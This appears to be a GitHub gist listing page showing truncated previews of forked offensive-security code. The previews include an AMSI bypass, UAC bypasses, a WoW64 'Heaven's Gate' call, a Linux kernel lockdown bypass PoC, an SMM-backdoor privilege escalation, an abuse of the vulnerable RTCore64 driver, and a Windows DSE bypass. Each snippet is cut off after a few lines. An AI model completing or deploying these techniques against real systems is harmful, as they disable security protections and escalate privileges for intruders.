💚

SkyN9ne SkyN9ne

💚

Hi, I'm SkyN9ne / Sky9Remixes ❤️ Reddit: https://reddit.com/user/Skyline9Time/ YT: https://YouTube.com/@Sky9Remixes/

SkyN9ne / amsi-bypass.ps1

Last active June 1, 2024 20:25 — forked from FatRodzianko/my-am-bypass.ps1

small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes

	$Win32 = @"
	using System;
	using System.Runtime.InteropServices;

	public class Win32 {

	[DllImport("kernel32")]
	public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

	[DllImport("kernel32")]

SkyN9ne / deobfuscate.py

Last active June 1, 2024 11:31 — forked from AmgdGocha/deobfuscation.py

Deobfuscates strings

	#!/usr/bin/env python

	def deobfuscate_strings(numbers_string, substract_number):
	result = ''

	numbers_list = numbers_string.split('.')

	for number in numbers_list:
	result = result + chr(int(number) - int(substract_number))

cmbaughman / .editorconfig

Created May 29, 2024 19:14

Editor Config

	[*]
	charset = utf-8
	end_of_line = lf
	indent_size = 2
	indent_style = space
	insert_final_newline = true
	trim_trailing_whitespace = true
	quote_type = single

	### Frontend files

SkyN9ne / WoW64_call.cpp

Created May 22, 2024 02:25 — forked from Cr4sh/WoW64_call.cpp

WoW64 Heaven's Gate

	#include "stdafx.h"

	#define DB(_val_) __asm __emit (_val_)

	#define INVALID_SYSCALL (DWORD)(-1)

	// code selectors
	#define CS_32 0x23
	#define CS_64 0x33

SkyN9ne / uac_bypass.c

Created May 22, 2024 02:23 — forked from Cr4sh/uac_bypass.c

	void TestCopy()
	{
	BOOL cond = FALSE;
	IFileOperation *FileOperation1 = NULL;
	IShellItem isrc = NULL, idst = NULL;
	BIND_OPTS3 bop;
	SHELLEXECUTEINFOW shexec;
	HRESULT r;

	do {

SkyN9ne / UAC-TokenMagic.ps1

Created May 22, 2024 02:21 — forked from Cr4sh/UAC-TokenMagic.ps1

UAC Token Magic

	function UAC-TokenMagic {
	<#
	.SYNOPSIS
	Based on James Forshaw's three part post on UAC, linked below, and possibly a technique
	used by the CIA!

	Essentially we duplicate the token of an elevated process, lower it's mandatory
	integrity level, use it to create a new restricted token, impersonate it and
	use the Secondary Logon service to spawn a new process with High IL. Like
	playing hide-and-go-seek with tokens! ;))

SkyN9ne / expl_msr_ko.py

Created May 22, 2024 02:19 — forked from Cr4sh/expl_msr_ko.py

msr.ko Linux kernel lockdown bypass PoC

	import sys, os, mmap, subprocess
	from struct import pack, unpack
	from ctypes import *

	IA32_SYSENTER_ESP = 0x175
	IA32_SYSENTER_EIP = 0x176

	class PyObj(Structure):

	_fields_ = [( 'ob_refcnt', c_size_t ),

SkyN9ne / smm_backdoor_privesc_win.py

Created May 22, 2024 02:16 — forked from Cr4sh/smm_backdoor_privesc_win.py

Example program that uses SMM backdoor for local privileges escalation under the Windows

	#!/usr/bin/env python

	import sys, os, platform, ctypes, ctypes.wintypes
	from struct import pack, unpack

	import smm_backdoor as bd


	# MSR register used by swapgs
	IA32_KERNEL_GS_BASE = 0xc0000102

SkyN9ne / kforge.cpp

Created May 22, 2024 00:08 — forked from Cr4sh/kforge.cpp

Performing arbitrary kernel function calls on HVCI enabled systems with thread context hijacking

	#include "stdafx.h"

	// vulnerable driver device name
	#define EXPL_DEVICE_PATH "\\\\.\\Global\\RTCore64"

	// vulnerable driver service and file name
	#define EXPL_DRIVER_NAME "RTCore64.sys"
	#define EXPL_SERVICE_NAME "RTCore64"

	// vulnerable driver IOCTL codes

SkyN9ne / main.c

Created May 22, 2024 00:03 — forked from maldiohead/main.c

NtLoadEnclaveData Windows 10 RS3 DSE bypass